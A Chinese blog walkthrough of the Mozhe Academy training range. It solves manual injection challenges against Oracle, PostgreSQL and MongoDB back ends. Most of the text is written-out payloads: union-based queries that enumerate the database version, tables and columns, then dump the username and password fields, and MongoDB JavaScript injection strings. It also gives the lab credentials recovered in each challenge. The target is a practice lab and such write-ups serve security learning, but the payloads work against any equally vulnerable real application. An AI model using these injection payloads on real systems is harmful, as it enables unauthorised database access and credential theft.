首页 > 其他分享 >墨者学院靶场通过攻略

墨者学院靶场通过攻略

时间:2024-08-26 19:57:50浏览次数:13  
标签:name list 攻略 new 靶场 null id select 墨者

SQL手工注入漏洞测试(Oracle数据库)

一,判断是否存在注⼊点

1.点击红色箭头

2.点击后出现这个页面看见上面有?id=1我们来判断这个注入点

3.回显报错,说明"and 1=2"语句拼接到了后端数据库查询语句当中

二,通过order by来判断字段数。因为order by 2⻚⾯正常,order by 3⻚⾯不正常,故判断当前字段数为2

new_list.php?id=1 order by 2

new_list.php?id=1 order by 3

三:获取显错点,联合查询这⾥使⽤了union select,oracle数据库与mysql数据库不同点在于它对
于字段点数据类型敏感,也就是说我们不能直接union select 1,2,3来获取显错点了,需要在字符型字段48
使⽤字符型数据,整型字段使⽤整型数据才可以。如下,两个字段都为字符型,故使⽤union select‘null’,‘null’

new_list.php?id=-1 union select 'null','null' from dual

四,查询数据库版本信息

new_list.php?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

五,查询当前数据库库名

new_list.php?id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual

六,查询数据库表名,查询表名⼀般查询admin或者user表

new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual

new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$') from dual

new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual

七,查询数据库列名

new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where table_name='sns_users' and rownum=1) from dual

new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where rownum=1 and column_name not in 'USER_NAME') from dual

new_list.php?id=-1 union select 'null' ,(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' ) from dual

new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' and column_name not in 'PROTOCOL' and column_name not in 'SPARE1' and column_name not in 'DB_USERNAME' and column_name not in 'OID' and column_name <> 'EVENTID' and column_name <> 'NAME' and column_name <> 'TABLE_OBJNO') from dual

模糊搜索查询

new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where table_name='sns_users' and rownum=1 and column_name like '%USE
R%') from dual

new_list.php?id=-1 union select 'null',(select column_name from user_tab_co
lumns where table_name='sns_users' and rownum=1 and column_name like '%USE
R%' and column_name <> 'USER_NAME') from dual

⼋,查询数据库数据获取账号密码的字段内容

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1



 

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where r
ownum=1 and USER_NAME <> 'zhong'

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

九,对其数据库内的字段内容进⾏解密....进⾏后台登录

mozhe:439718

登录并提交Flag

PostGREsql⼿⼯注⼊

步骤⼀:查看是否存在注⼊点...构造Payload;回显没有显示数据,代表“and 1=2”语句拼接到了后端数据库查询语句当中...

步骤⼆:开始猜解后端收据库能够返回多少个字段..发现order by 5的时候没有数据回显,orderby 4 有回显数据,所以后端返回到前端的数据字段数为4个

new_list.php?id=1 order by 4

new_list.php?id=1 order by 5

步骤三:开始检测这4个字段当中哪些字段可以被前端显示出来且使⽤union 查询来构造Payload通过测试

new_list.php?id=1 and 1=2 union select 'null',null,null,null

无显示

new_list.php?id=1 and 1=2 union select null,'null',null,null

有显示

new_list.php?id=1 and 1=2 union select null,null,'null',null

有显示

new_list.php?id=1 and 1=2 union select null,null,null,'null'

无显示

通过测试发现只有第⼆第三个字段是前端回显数据字段。

步骤四:在这两个字段当中来查询我们想要的得到的数据。例如得到当前数据库名称和当前⽤户以及数据库的版本

new_list.php?id=1 and 1=2 union select null,null,string_agg(datname,','),null from pg_database

爆出所有数据库


步骤五:构造Payload爆指定数据库下的表名

new_list.php?id=1 and 1=2 union select null,null,string_agg(tablename,','),null from pg_tables where schemaname='public'

步骤六:此时我们已经得到了表并开始查询字段,由于查询到的第⼆个表名带有“user”,我们就先查询它

new_list.php?id=1 and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'

步骤七:查询到字段以后,最后⼀步就是爆出数据payload

new_list.php?id=1 and 1=2 union select null,string_agg(name,','),string_agg
(password,','),null from reg_users

步骤⼋:解密并得到相对应账号密码 mozhe2,mozhe1

mozhe2:1qaz2wsx

mozhe1:785576

登录并提交Flag

MongoDB⼿⼯注⼊

步骤⼀:构造回显测试

new_list.php?id=1'});return ({title:'1',content:'2

步骤二:查看数据库

new_list.php?id=1'});return({title:tojson(db),content:'2

步骤三:查看表名

new_list.php?id=1'});return({title:tojson(db.getCollectionNames()),content:'2

步骤四:查看表数据

new_list.php?id=1'});return({title:tojson(db.Authority_confidential.find() [ 1 ] ),content:'2

步骤五:解密登录

username:mozhe(账号)

password:902621(密码)

登录并提交Flag

 

标签:name,list,攻略,new,靶场,null,id,select,墨者
From: https://blog.csdn.net/2301_81881972/article/details/141363401

相关文章

  • xss-labs靶场通关攻略
    第一关我们来到第一关发现什么提示也没有试着输一个<script>alert()</script>第一关还是简单的直接输入就可以了第二关一,我们尝试在搜索框输入<script>alert()</script>发现没有成功二,查看一下源代码输入的<script>alert()</script>在<input>标签的value中,需要">闭合......
  • ACCESS手工注入靶场
    步骤一:打开网页判断是否存在注入判断注入点news_view.asp?id=14'//报错news_view.asp?id=14and1=1 //成功news_view.asp?id=14and1=2 //报错步骤二:判断当前数据库的字段文件...其到达8时页面置空,说明语句执行失败,当前数据库的字段仅有7列?id=14orderby......
  • sqli-labs靶场通关攻略 31-35
    主页有sqli-labs靶场通关攻略1-30第三一关less-31闭合方式为?id=1&id=1")--+步骤一:查看数据库名http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%201,database(),3%20--+ 步骤二:查看表名http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%2......
  • MSSQL SQLi Labs 手工注入靶场
    less-1步骤一:判断注入方式 ?id=1'--+步骤二:判断后台是否是MYSQL数据库?id=1'andexists(select*fromsysobjects)--+步骤三:查询数据库信息,user回显的dbo表示是最⾼权限,如果是⽤户的名字表示是普通权限?id=-1'unionselect1,user,is_srvrolemember('public');-......
  • sqli-labs靶场通关攻略(31-35关)
    第31关(")闭合)查数据库?id=")unionselect1,2,database()--+查表?id=")unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_schema='security'--+查列?id=")unionselect1,2,group_concat(column_nam......
  • 一文掌握:HTML标签使用全攻略,打造完美网页布局!
    HTML(超文本标记语言)是构建网页的基石。通过不同的标签,HTML定义了网页的结构和内容。了解各种HTML标签的用法是前端开发的基础。本文将回顾HTML中常见标签的用法,并介绍它们在实际开发中的应用。一、结构性标签<!DOCTYPEhtml>这个标签声明文档类型,并指定HTML5标准。它应......
  • 安许续期遭拒,河南企业申诉材料撰写攻略
    当河南企业的安全生产许可证(安许)续期申请遭拒时,撰写申诉材料是一项重要且复杂的任务。以下是一份详细的申诉材料撰写攻略,旨在帮助企业高效、准确地准备申诉材料,提高申诉成功率。一、明确申诉理由首先,企业需要明确安许续期遭拒的具体原因。这通常会在官方的拒绝通知中明确列出......
  • 图像降噪神器:低通滤波技术的全面攻略
    今天我们来聊聊图像处理中的一个重要工具——低通滤波。通过理解低通滤波的原理和应用,我们可以更好地掌控图像质量,使得视觉效果更符合我们的预期。我会介绍低通滤波的多种类型、工作原理、具体应用场景及其优缺点,并结合实际案例进行详细分析。0 定义低通滤波(Low-PassFilte......
  • sqli-labs靶场通关攻略(20-40)
    第二十一关登陆后显示如下图界面,感觉和cookie注入有些相似进行抓包,发现cookie被编码返回来查看源代码,发现这里被base64编码我们将抓到的包发至重放器,在cookie字段写入查询代码并改为base64编码发送请求即可得到数据库名剩余操作大家自行查询第二十二关登陆后显示......
  • 中国平安25届校招测评题库:平安IQ新、16PF测评真题题库及高分攻略
      平安IQ测评答题指南 答题要求题量与时间:30题,限时57分钟。题型:单选题,每题60~120秒。注意事项:不可逆作答,全屏显示,避免中途退出或切换网页,准备计算器或草稿纸,确保网络稳定和电量充足。答题建议最佳答题时间:20~40分钟。答题策略:满分答案建议错2~3......